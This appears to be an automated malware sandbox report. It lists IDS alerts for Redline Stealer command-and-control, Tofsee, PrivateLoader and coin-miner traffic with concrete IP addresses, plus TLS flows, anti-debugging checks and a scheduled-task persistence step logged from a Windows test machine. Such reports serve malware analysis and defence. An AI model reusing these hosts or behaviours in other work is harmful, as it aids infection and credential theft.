TCP 192.168.56.103:49288 -> 45.130.41.108:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 94.232.45.38:80 -> 192.168.56.103:49274	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49292 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 87.240.132.78:80 -> 192.168.56.103:49292	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49295 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 147.45.47.149:54674 -> 192.168.56.103:49297	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 147.45.47.149:54674 -> 192.168.56.103:49297	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49303 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49301 -> 45.130.41.108:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49302 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49306 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49277 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49277 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49308 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49312 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49310 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49310 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 64.185.227.155:443 -> 192.168.56.103:49244	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49315 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49315 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49316 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49316 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49257 -> 104.20.3.235:443	906200068	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (CoinMiner)	undefined
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
UDP 192.168.56.103:50816 -> 164.124.101.2:53	2033268	ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49319 -> 37.221.125.202:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49317 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49322 -> 37.221.125.202:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 87.240.132.78:80 -> 192.168.56.103:49320	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49323 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 87.240.132.78:80 -> 192.168.56.103:49323	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 37.221.125.202:443 -> 192.168.56.103:49324	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49326 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49325 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49330 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49331 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49335 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49265 -> 85.192.56.26:80	2049837	ET MALWARE Suspected PrivateLoader Activity (POST)	A Network Trojan was detected
TCP 192.168.56.103:49265 -> 85.192.56.26:80	2049837	ET MALWARE Suspected PrivateLoader Activity (POST)	A Network Trojan was detected
TCP 91.202.233.232:80 -> 192.168.56.103:49275	2400013	ET DROP Spamhaus DROP Listed Traffic Inbound group 14	Misc Attack
TCP 192.168.56.103:49275 -> 91.202.233.232:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49268 -> 5.42.66.10:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49276 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49276 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49275 -> 91.202.233.232:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49268 -> 5.42.66.10:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 91.202.233.232:80 -> 192.168.56.103:49275	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 91.202.233.232:80 -> 192.168.56.103:49275	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49293 -> 104.21.66.124:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49290 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 87.240.132.78:80 -> 192.168.56.103:49290	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 5.42.66.10:80 -> 192.168.56.103:49268	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49268	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49294 -> 45.130.41.108:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49296 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49296 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 5.42.66.10:80 -> 192.168.56.103:49342	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49342	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49342	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.103:49304 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49304 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49307 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49307 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49311 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49363 -> 104.192.141.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49318 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49318 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 5.42.66.10:80 -> 192.168.56.103:49332	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49332	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49332	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 185.215.113.67:40960	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49245 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49192 172.67.169.89:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=yip.su	d6:8b:e9:f2:36:d3:41:9a:cd:54:05:25:68:49:59:5d:36:4b:1a:38
TLSv1 192.168.56.103:49187 23.43.165.153:443	C=US, O=Let's Encrypt, CN=R3	CN=download.winzip.com	30:9b:82:ca:d6:ce:c6:fe:83:10:ba:23:41:9a:e9:9b:a3:98:36:9a
TLS 1.2 192.168.56.103:49191 172.67.19.24:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=pastebin.com	51:a9:80:ce:77:62:b2:72:d2:05:30:60:fd:f4:39:60:f3:7d:ac:16
TLS 1.2 192.168.56.103:49196 54.192.175.109:443	C=CN, O=WoTrus CA Limited, CN=WoTrus DV Server CA [Run by the Issuer]	CN=free.360totalsecurity.com	4f:76:01:e7:f6:e1:fc:0e:2f:fe:b0:89:6a:bc:1c:cf:63:d4:51:58
TLS 1.2 192.168.56.103:49199 104.153.233.177:443	C=US, O=Let's Encrypt, CN=R3	CN=backblazeb2.com	c3:1e:e9:5b:82:2b:2d:13:7d:ed:23:05:c4:07:9a:19:b1:71:bd:d1
TLSv1 192.168.56.103:49183 23.43.165.153:443	C=US, O=Let's Encrypt, CN=R3	CN=download.winzip.com	30:9b:82:ca:d6:ce:c6:fe:83:10:ba:23:41:9a:e9:9b:a3:98:36:9a
TLSv1 192.168.56.103:49188 23.43.165.153:443	C=US, O=Let's Encrypt, CN=R3	CN=download.winzip.com	30:9b:82:ca:d6:ce:c6:fe:83:10:ba:23:41:9a:e9:9b:a3:98:36:9a
TLSv1 192.168.56.103:49241 104.26.9.59:443	C=US, O=Let's Encrypt, CN=R3	CN=myip.com	81:cd:fe:ad:24:9d:a3:fa:b9:34:be:53:2f:fe:1e:91:2a:ac:03:2a
TLS 1.3 192.168.56.103:49255 51.195.138.197:10943	None	None	None
TLSv1 192.168.56.103:49254 82.145.215.156:443	C=CN, O=WoTrus CA Limited, CN=WoTrus DV Server CA [Run by the Issuer]	CN=static.360totalsecurity.com	2c:85:a3:e4:0e:fb:0e:8c:f8:04:1a:a9:02:b8:0d:ab:85:5f:b0:b3
TLSv1 192.168.56.103:49247 104.26.5.15:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=db-ip.com	1f:af:15:cd:f8:f8:ee:30:f9:6e:6e:54:bc:9a:a7:c7:77:70:6d:25
TLSv1 192.168.56.103:49287 172.67.213.39:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=fleur-de-lis.sbs	b1:db:2b:5a:3b:10:70:c9:6e:f7:88:c4:d1:d7:96:7d:37:1f:d7:49
TLSv1 192.168.56.103:49291 18.64.13.203:443	C=US, O=Amazon, CN=Amazon RSA 2048 M01	CN=*.cloudfront.net	fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1 192.168.56.103:49301 45.130.41.108:443	C=US, O=Let's Encrypt, CN=R3	CN=monoblocked.com	2c:d3:99:84:08:33:38:25:31:da:34:23:da:07:ec:a6:6f:e6:0a:ac
TLSv1 192.168.56.103:49306 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLS 1.3 192.168.56.103:49258 51.15.65.182:14433	None	None	None
TLS 1.3 192.168.56.103:49257 104.20.3.235:443	None	None	None
TLSv1 192.168.56.103:49317 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1 192.168.56.103:49326 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1 192.168.56.103:49325 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1 192.168.56.103:49331 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1 192.168.56.103:49335 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1 192.168.56.103:49293 104.21.66.124:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=foxesjoy.com	98:61:17:75:9f:9b:34:ec:5e:dd:5b:36:49:5e:1b:7d:2d:22:18:22
TLSv1 192.168.56.103:49311 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLS 1.2 192.168.56.103:49363 104.192.141.1:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian US, Inc., CN=bitbucket.org	bf:7c:47:a3:25:75:32:6e:c5:f8:ea:29:e6:bd:ba:2d:a7:99:28:78

Queries for the computername (43 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 31, 2024, 7:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 31, 2024, 7:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 7:34 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 80 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 31, 2024, 7:29 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:29 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:29 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:29 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:29 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:29 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:29 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:29 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:29 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:29 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:29 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:30 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:31 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:31 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:31 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:31 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:31 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:31 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:31 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:31 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:31 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:31 a.m.			0	0
IsDebuggerPresent May 31, 2024, 7:31 a.m.			0	0

Command line console output was observed (50 out of 105 events)

Time & API	Arguments	Status	Return
WriteConsoleA May 31, 2024, 7:29 a.m.	buffer: Madino Mino console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:29 a.m.	buffer: Write command. For help write '5' Don't TRY TO WRITE WORDS!!! ONLY NUMBERS!!! Like:help and other... root@calculator-unstable:~# console_handle: 0x00000007	1	1
WriteConsoleW May 31, 2024, 7:33 a.m.	buffer: SUCCESS: The scheduled task "Newoff.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW May 31, 2024, 7:34 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW May 31, 2024, 7:34 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW May 31, 2024, 7:34 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW May 31, 2024, 7:34 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: U console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: n console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: g console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: P console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: U console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: P console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: h console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: m console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA May 31, 2024, 7:34 a.m.	buffer: s console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 110 events)

Time & API	Arguments	Status	Return
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f6160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
